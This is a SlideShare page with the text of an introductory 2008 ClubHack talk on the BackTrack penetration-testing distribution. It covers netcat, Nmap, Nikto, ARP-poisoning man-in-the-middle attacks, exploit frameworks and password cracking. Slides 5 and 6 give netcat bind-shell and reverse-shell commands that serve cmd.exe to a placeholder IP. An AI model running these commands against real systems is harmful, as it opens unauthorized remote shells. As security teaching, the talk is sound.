SlideShare a Scribd company logo
Introduction to BackTrack Local boot to remote root in just one CD Thought for the day, “Don’t learn to hack, hack to learn”..!!! -  darknet.org.uk Kunal Sehgal [email_address]
Introduction: BackTrack is a suite of penetration testing/vulnerability assessment tools installed on a Linux Operating System, all wrapped-up on a bootable (live) CD The most top rated Linux live distribution focused on penetration testing Consists of more than 300 different up-to-date tools which are logically structured according to the work flow of security professionals Rated #1 Security-Distro by insecure.org & sectools.org
Miscellaneous BT Services: HTTP (Port: 80) TFTP (Port: 69) SSH (Port: 22) VNC (Port: 5901)
Netcat: A computer networking utility for reading from and writing to network connections on either TCP or UDP Feature-rich network debugging and exploration tool, since it can create almost any kind of connection you would need, including port binding to accept incoming connections Bind Shell Reverse Shell
Attacker (Private IP) Victim (Public IP) NAT Internet Bind Shell: nc -lvp 4444 -e cmd.exe nc -v <IP> 4444 Internet Attacker Connects to Victim (Incoming Traffic)
Attacker (Public IP) Victim (Private IP) Internet Reverse Shell: nc -v <IP> 4444 -e cmd.exe nc -lvp 4444 Internet NAT Victim sends the shell (Outgoing Traffic)
Nmap: A security scanner used to discover computers and services on a computer network, thus creating a &quot;map&quot; of the network Capable of discovering passive services on a network despite the fact that such services aren't advertising themselves May be able to determine various details about the remote computers. These include operating system, device type, uptime, software product used to run a service, exact version number of that product, etc.
Nikto: A scanner which performs comprehensive tests against web servers for multiple items Includes over 3500 potentially dangerous files/CGIs, versions on over 900 servers, and version specific problems on over 250 servers Not every check is a security problem, though most are There are some items that are &quot;info only&quot; type checks that look for items that may not have a security flaw, but the webmaster or security engineer may not know are present on the server
ARP Poisoning – Man In The Middle Attack: MAC Address : Hardware address or physical address is a quasi-unique identifier assigned to most network adapters or network interface cards (NICs) by the manufacturer for identification Address Resolution Protocol (ARP) : A method for finding a host's hardware address when only its Network Layer address is known Ettercap : A suite for man in the middle attacks on LAN. It features sniffing of live connections, content filtering on the fly and many other interesting tricks
Attacker Sender Receiver Network Using A Hub Can easily sniff data
Attacker Sender Receiver Network Using A Switch Cannot sniff any data  :(
Attacker Sender Receiver Man In The Middle Attack Hi everyone, I’m the switch
Exploits: An exploit is a piece of software, a chunk of data, or sequence of commands that take advantage of a bug, glitch or  vulnerability  in order to cause unintended or unanticipated behavior to occur Frequently includes such things as violently gaining control of a computer system or allowing privilege escalation or a denial of service attack Zero Day Exploit: A threat that tries to exploit unknown, undisclosed or patchfree computer application vulnerabilities www.securityfocus.com  &  www.milw0rm.com
Exploits (Conti…): Attack / Exploit Vulnerability App Protocol O/S Add a user Get a remote shell GUI access Change routing tables Etc.. Etc.. Payload
Exploit Frameworks: A development platform for creating security tools and exploits Used by network security professionals to perform penetration tests, system administrators to verify patch installations, product vendors to perform regression testing, and security researchers world-wide A boon for script kiddies
Windows DCOM RPC Interface Buffer Overrun: Exploits a vulnerability in Windows OS The issue is due to insufficient bounds checking of client DCOM object activation requests. Exploitation of this issue could result in execution of malicious instructions with Local System privileges on an affected system www.securityfocus.com/bid/8205 Bind Shell
IE IsComponentInstalled Buffer Overflow Vulnerability: Exploits a vulnerability in an application (MS Internet Explorer) Microsoft Internet Explorer is prone to a remote buffer-overflow vulnerability in the 'IsComponentInstalled()' method. A successful exploit results in arbitrary code execution in the context of the user running the browser www.securityfocus.com/bid/16870 Reverse Shell
MS Windows Graphics Rendering Engine WMF: Exploits a vulnerability in MS Windows WMF graphics rendering engine The problem presents itself when a user views a malicious WMF formatted file, triggering the vulnerability when the engine attempts to parse the file www.securityfocus.com/bid/16074
Passwords Hacking: Why hack local passwords? Install softwares – key loggers, trojans, etc Gain access to another PC, Server, Router, etc. People re-use passwords all the time Types of attack: Brute force Attack Dictionary Attack Rainbow Tables
Password Attack Vectors: Online Attack : Attacking network services that require a user to log on, by guessing the correct password Offline Attack : Attacking hash files that store encrypted passwords Physical Access Attack : Attacking machines and other network devices, after gaining physical access
How To Hack Windows Passwords? Available Tools: John The Ripper, Cain & Abel, Rainbow Tables Gain access to the victim’s PC
Google Hacking: Google hacking is a term that refers to the act of creating complex search engine queries in order to filter through large amounts of search results In its malicious format it can be used to detect websites that are vulnerable to numerous exploits and vulnerabilities as well as locate private, sensitive information about others http://johnny.ihackstuff.com
References: www.remote-exploit.org www.offensive-security.com www.wikipedia.org www.metasploit.com www.irongeek.com www.cirt.net/nikto2 www.sourceforge.net www.securityfocus.com www.darknet.org.uk johnny.ihackstuff.com www.oxid.it/cain.html
Questions?? Feel free to contact me: Kunal Sehgal
Workshop Exercise:

More Related Content

PPT
Ch08 Microsoft Operating System Vulnerabilities
PPT
Anton Chuvakin on Honeypots
PPTX
Network defenses
PDF
Web backdoors attacks, evasion, detection
PDF
Ch 13: Network Protection Systems
PPTX
Dealing with legacy code
PDF
Ch 4: Footprinting and Social Engineering
Ch08 Microsoft Operating System Vulnerabilities
Anton Chuvakin on Honeypots
Network defenses
Web backdoors attacks, evasion, detection
Ch 13: Network Protection Systems
Dealing with legacy code
Ch 4: Footprinting and Social Engineering

What's hot (20)

PPTX
Hacker bootcamp
PPT
Attacking Automatic Wireless Network Selection
PPTX
Malware analysis
PPT
Module 8 System Hacking
PDF
Ceh v5 module 14 sql injection
PDF
Ceh v5 module 11 hacking webservers
PPTX
System hacking
 
PPTX
Telehack: May the Command Line Live Forever
PPT
Presentation Prepared By: Mohamad Almajali
PDF
Ceh v5 module 03 scanning
PDF
Ceh v5 module 05 system hacking
PDF
The Dark Side of PowerShell by George Dobrea
PDF
Ch14 security
PPT
Freeware Security Tools You Need
PPTX
Ethical hacking Chapter 6 - Port Scanning - Eric Vanderburg
PPTX
Soho routers: swords and shields CyberCamp 2015
PPT
Chapter 09
PPTX
A walk through Windows firewall and Netsh commands
PPTX
Ethical hacking Chapter 12 - Encryption - Eric Vanderburg
PPTX
Ethical hacking chapter 8 - Windows Vulnerabilities - Eric Vanderburg
Hacker bootcamp
Attacking Automatic Wireless Network Selection
Malware analysis
Module 8 System Hacking
Ceh v5 module 14 sql injection
Ceh v5 module 11 hacking webservers
System hacking
 
Telehack: May the Command Line Live Forever
Presentation Prepared By: Mohamad Almajali
Ceh v5 module 03 scanning
Ceh v5 module 05 system hacking
The Dark Side of PowerShell by George Dobrea
Ch14 security
Freeware Security Tools You Need
Ethical hacking Chapter 6 - Port Scanning - Eric Vanderburg
Soho routers: swords and shields CyberCamp 2015
Chapter 09
A walk through Windows firewall and Netsh commands
Ethical hacking Chapter 12 - Encryption - Eric Vanderburg
Ethical hacking chapter 8 - Windows Vulnerabilities - Eric Vanderburg

Viewers also liked (20)

PPT
Rohas - 7 Years Of Indian Cyber Laws - ClubHack2007
PPS
Harshad - Economic offenses through Credit Card Frauds Dissected - ClubHack2008
PDF
Handle Explotion of Remote System Without Being Online (Merchant Bhaumik)
PDF
How Android Based Phone Helped Me Win American Idol (Elad Shapira)
PDF
Clubhack Magazine Issue February 2012
PPTX
Picrand
PPTX
Qualidade 5 S
PDF
Sma -ekonomi_2005- pdf
PDF
Decreto exento 2140 abre registro cosoc
PDF
11 ideas clave Esquema
PDF
Cloud on Your Terms: Hybrid IT Laminate
DOC
Comunicado del equipo de gobierno del ayuntamiento de pozo alcón
PDF
Kodak zi8 8 27-12 ass.2
PDF
Cembre L10-M Copper Splices, 50sqmm
PPSX
Miguel angel
PDF
Web Typography5 090725053013 Phpapp02
PPS
Ressamlari kiskandiracak
PDF
Prevision samedi 05 juillet 2014
PDF
ค่าและหน่วยไฟฟ้า พ.ค. 57
PDF
Assis.social2
Rohas - 7 Years Of Indian Cyber Laws - ClubHack2007
Harshad - Economic offenses through Credit Card Frauds Dissected - ClubHack2008
Handle Explotion of Remote System Without Being Online (Merchant Bhaumik)
How Android Based Phone Helped Me Win American Idol (Elad Shapira)
Clubhack Magazine Issue February 2012
Picrand
Qualidade 5 S
Sma -ekonomi_2005- pdf
Decreto exento 2140 abre registro cosoc
11 ideas clave Esquema
Cloud on Your Terms: Hybrid IT Laminate
Comunicado del equipo de gobierno del ayuntamiento de pozo alcón
Kodak zi8 8 27-12 ass.2
Cembre L10-M Copper Splices, 50sqmm
Miguel angel
Web Typography5 090725053013 Phpapp02
Ressamlari kiskandiracak
Prevision samedi 05 juillet 2014
ค่าและหน่วยไฟฟ้า พ.ค. 57
Assis.social2

Similar to Kunal - Introduction to BackTrack - ClubHack2008 (20)

PDF
Hack Attack! An Introduction to Penetration Testing
PPT
Security & ethical hacking p2
PPTX
DC612 Day - Hands on Penetration Testing 101
PDF
Intrusion Techniques
PDF
The Dirty Little Secrets They Didn’t Teach You In Pentesting Class
PDF
24 33 -_metasploit
PPT
Security & ethical hacking
PDF
Exploits Attack on Windows Vulnerabilities
PPT
Sembang2 Keselamatan It 2004
PPTX
Introduction To Ethical Hacking
PPT
How hackers attack networks
PPT
Intro To Hacking
PPTX
Finalppt metasploit
PPTX
Phases of penetration testing
PDF
HITB2013AMS Defenting the enterprise, a russian way!
 
PPTX
InOffensive Security_cybersecurity2.pptx
PDF
Metasploit for Penetration Testing: Beginner Class
PDF
Hacking school computers for fun profit and better grades short
PDF
Metasploitation part-1 (murtuja)
PPTX
Network Penetration Testing
Hack Attack! An Introduction to Penetration Testing
Security & ethical hacking p2
DC612 Day - Hands on Penetration Testing 101
Intrusion Techniques
The Dirty Little Secrets They Didn’t Teach You In Pentesting Class
24 33 -_metasploit
Security & ethical hacking
Exploits Attack on Windows Vulnerabilities
Sembang2 Keselamatan It 2004
Introduction To Ethical Hacking
How hackers attack networks
Intro To Hacking
Finalppt metasploit
Phases of penetration testing
HITB2013AMS Defenting the enterprise, a russian way!
 
InOffensive Security_cybersecurity2.pptx
Metasploit for Penetration Testing: Beginner Class
Hacking school computers for fun profit and better grades short
Metasploitation part-1 (murtuja)
Network Penetration Testing

More from ClubHack (20)

PDF
India legal 31 october 2014
PPTX
Cyberlaw by Mr. Pavan Duggal at ClubHack Infosec KeyNote @ Bangalore
PPT
Cyber Insurance
PPTX
Summarising Snowden and Snowden as internal threat
PPTX
Fatcat Automatic Web SQL Injector by Sandeep Kamble
PDF
The Difference Between the Reality and Feeling of Security by Thomas Kurian
PDF
Stand Close to Me & You're pwned! Owning Smart Phones using NFC by Aditya Gup...
PPTX
Smart Grid Security by Falgun Rathod
PPTX
Legal Nuances to the Cloud by Ritambhara Agrawal
PPT
Infrastructure Security by Sivamurthy Hiremath
PDF
Hybrid Analyzer for Web Application Security (HAWAS) by Lavakumar Kuppan
PPTX
Hacking and Securing iOS Applications by Satish Bomisstty
PPTX
Critical Infrastructure Security by Subodh Belgi
PPTX
Content Type Attack Dark Hole in the Secure Environment by Raman Gupta
PDF
XSS Shell by Vandan Joshi
PDF
ClubHack Magazine issue 26 March 2012
PDF
ClubHack Magazine issue April 2012
PDF
ClubHack Magazine Issue May 2012
PDF
ClubHack Magazine – December 2011
PDF
One link Facebook (Anand Pandey)
India legal 31 october 2014
Cyberlaw by Mr. Pavan Duggal at ClubHack Infosec KeyNote @ Bangalore
Cyber Insurance
Summarising Snowden and Snowden as internal threat
Fatcat Automatic Web SQL Injector by Sandeep Kamble
The Difference Between the Reality and Feeling of Security by Thomas Kurian
Stand Close to Me & You're pwned! Owning Smart Phones using NFC by Aditya Gup...
Smart Grid Security by Falgun Rathod
Legal Nuances to the Cloud by Ritambhara Agrawal
Infrastructure Security by Sivamurthy Hiremath
Hybrid Analyzer for Web Application Security (HAWAS) by Lavakumar Kuppan
Hacking and Securing iOS Applications by Satish Bomisstty
Critical Infrastructure Security by Subodh Belgi
Content Type Attack Dark Hole in the Secure Environment by Raman Gupta
XSS Shell by Vandan Joshi
ClubHack Magazine issue 26 March 2012
ClubHack Magazine issue April 2012
ClubHack Magazine Issue May 2012
ClubHack Magazine – December 2011
One link Facebook (Anand Pandey)

Recently uploaded (20)

PPTX
Big Data Technologies - Introduction.pptx
DOCX
The AUB Centre for AI in Media Proposal.docx
PPTX
20250228 LYD VKU AI Blended-Learning.pptx
PDF
How UI/UX Design Impacts User Retention in Mobile Apps.pdf
PDF
cuic standard and advanced reporting.pdf
PDF
Reach Out and Touch Someone: Haptics and Empathic Computing
PPTX
Cloud computing and distributed systems.
PDF
Bridging biosciences and deep learning for revolutionary discoveries: a compr...
PDF
Empathic Computing: Creating Shared Understanding
PDF
The Rise and Fall of 3GPP – Time for a Sabbatical?
PDF
KodekX | Application Modernization Development
PPTX
MYSQL Presentation for SQL database connectivity
PDF
Modernizing your data center with Dell and AMD
PDF
Unlocking AI with Model Context Protocol (MCP)
PPTX
VMware vSphere Foundation How to Sell Presentation-Ver1.4-2-14-2024.pptx
PDF
Approach and Philosophy of On baking technology
PDF
Per capita expenditure prediction using model stacking based on satellite ima...
PPTX
A Presentation on Artificial Intelligence
PDF
Spectral efficient network and resource selection model in 5G networks
PDF
Network Security Unit 5.pdf for BCA BBA.
Big Data Technologies - Introduction.pptx
The AUB Centre for AI in Media Proposal.docx
20250228 LYD VKU AI Blended-Learning.pptx
How UI/UX Design Impacts User Retention in Mobile Apps.pdf
cuic standard and advanced reporting.pdf
Reach Out and Touch Someone: Haptics and Empathic Computing
Cloud computing and distributed systems.
Bridging biosciences and deep learning for revolutionary discoveries: a compr...
Empathic Computing: Creating Shared Understanding
The Rise and Fall of 3GPP – Time for a Sabbatical?
KodekX | Application Modernization Development
MYSQL Presentation for SQL database connectivity
Modernizing your data center with Dell and AMD
Unlocking AI with Model Context Protocol (MCP)
VMware vSphere Foundation How to Sell Presentation-Ver1.4-2-14-2024.pptx
Approach and Philosophy of On baking technology
Per capita expenditure prediction using model stacking based on satellite ima...
A Presentation on Artificial Intelligence
Spectral efficient network and resource selection model in 5G networks
Network Security Unit 5.pdf for BCA BBA.

Kunal - Introduction to BackTrack - ClubHack2008

  • 1. Introduction to BackTrack Local boot to remote root in just one CD Thought for the day, “Don’t learn to hack, hack to learn”..!!! - darknet.org.uk Kunal Sehgal [email_address]
  • 2. Introduction: BackTrack is a suite of penetration testing/vulnerability assessment tools installed on a Linux Operating System, all wrapped-up on a bootable (live) CD The most top rated Linux live distribution focused on penetration testing Consists of more than 300 different up-to-date tools which are logically structured according to the work flow of security professionals Rated #1 Security-Distro by insecure.org & sectools.org
  • 3. Miscellaneous BT Services: HTTP (Port: 80) TFTP (Port: 69) SSH (Port: 22) VNC (Port: 5901)
  • 4. Netcat: A computer networking utility for reading from and writing to network connections on either TCP or UDP Feature-rich network debugging and exploration tool, since it can create almost any kind of connection you would need, including port binding to accept incoming connections Bind Shell Reverse Shell
  • 5. Attacker (Private IP) Victim (Public IP) NAT Internet Bind Shell: nc -lvp 4444 -e cmd.exe nc -v <IP> 4444 Internet Attacker Connects to Victim (Incoming Traffic)
  • 6. Attacker (Public IP) Victim (Private IP) Internet Reverse Shell: nc -v <IP> 4444 -e cmd.exe nc -lvp 4444 Internet NAT Victim sends the shell (Outgoing Traffic)
  • 7. Nmap: A security scanner used to discover computers and services on a computer network, thus creating a &quot;map&quot; of the network Capable of discovering passive services on a network despite the fact that such services aren't advertising themselves May be able to determine various details about the remote computers. These include operating system, device type, uptime, software product used to run a service, exact version number of that product, etc.
  • 8. Nikto: A scanner which performs comprehensive tests against web servers for multiple items Includes over 3500 potentially dangerous files/CGIs, versions on over 900 servers, and version specific problems on over 250 servers Not every check is a security problem, though most are There are some items that are &quot;info only&quot; type checks that look for items that may not have a security flaw, but the webmaster or security engineer may not know are present on the server
  • 9. ARP Poisoning – Man In The Middle Attack: MAC Address : Hardware address or physical address is a quasi-unique identifier assigned to most network adapters or network interface cards (NICs) by the manufacturer for identification Address Resolution Protocol (ARP) : A method for finding a host's hardware address when only its Network Layer address is known Ettercap : A suite for man in the middle attacks on LAN. It features sniffing of live connections, content filtering on the fly and many other interesting tricks
  • 10. Attacker Sender Receiver Network Using A Hub Can easily sniff data
  • 11. Attacker Sender Receiver Network Using A Switch Cannot sniff any data :(
  • 12. Attacker Sender Receiver Man In The Middle Attack Hi everyone, I’m the switch
  • 13. Exploits: An exploit is a piece of software, a chunk of data, or sequence of commands that take advantage of a bug, glitch or vulnerability in order to cause unintended or unanticipated behavior to occur Frequently includes such things as violently gaining control of a computer system or allowing privilege escalation or a denial of service attack Zero Day Exploit: A threat that tries to exploit unknown, undisclosed or patchfree computer application vulnerabilities www.securityfocus.com & www.milw0rm.com
  • 14. Exploits (Conti…): Attack / Exploit Vulnerability App Protocol O/S Add a user Get a remote shell GUI access Change routing tables Etc.. Etc.. Payload
  • 15. Exploit Frameworks: A development platform for creating security tools and exploits Used by network security professionals to perform penetration tests, system administrators to verify patch installations, product vendors to perform regression testing, and security researchers world-wide A boon for script kiddies
  • 16. Windows DCOM RPC Interface Buffer Overrun: Exploits a vulnerability in Windows OS The issue is due to insufficient bounds checking of client DCOM object activation requests. Exploitation of this issue could result in execution of malicious instructions with Local System privileges on an affected system www.securityfocus.com/bid/8205 Bind Shell
  • 17. IE IsComponentInstalled Buffer Overflow Vulnerability: Exploits a vulnerability in an application (MS Internet Explorer) Microsoft Internet Explorer is prone to a remote buffer-overflow vulnerability in the 'IsComponentInstalled()' method. A successful exploit results in arbitrary code execution in the context of the user running the browser www.securityfocus.com/bid/16870 Reverse Shell
  • 18. MS Windows Graphics Rendering Engine WMF: Exploits a vulnerability in MS Windows WMF graphics rendering engine The problem presents itself when a user views a malicious WMF formatted file, triggering the vulnerability when the engine attempts to parse the file www.securityfocus.com/bid/16074
  • 19. Passwords Hacking: Why hack local passwords? Install softwares – key loggers, trojans, etc Gain access to another PC, Server, Router, etc. People re-use passwords all the time Types of attack: Brute force Attack Dictionary Attack Rainbow Tables
  • 20. Password Attack Vectors: Online Attack : Attacking network services that require a user to log on, by guessing the correct password Offline Attack : Attacking hash files that store encrypted passwords Physical Access Attack : Attacking machines and other network devices, after gaining physical access
  • 21. How To Hack Windows Passwords? Available Tools: John The Ripper, Cain & Abel, Rainbow Tables Gain access to the victim’s PC
  • 22. Google Hacking: Google hacking is a term that refers to the act of creating complex search engine queries in order to filter through large amounts of search results In its malicious format it can be used to detect websites that are vulnerable to numerous exploits and vulnerabilities as well as locate private, sensitive information about others http://johnny.ihackstuff.com
  • 23. References: www.remote-exploit.org www.offensive-security.com www.wikipedia.org www.metasploit.com www.irongeek.com www.cirt.net/nikto2 www.sourceforge.net www.securityfocus.com www.darknet.org.uk johnny.ihackstuff.com www.oxid.it/cain.html
  • 24. Questions?? Feel free to contact me: Kunal Sehgal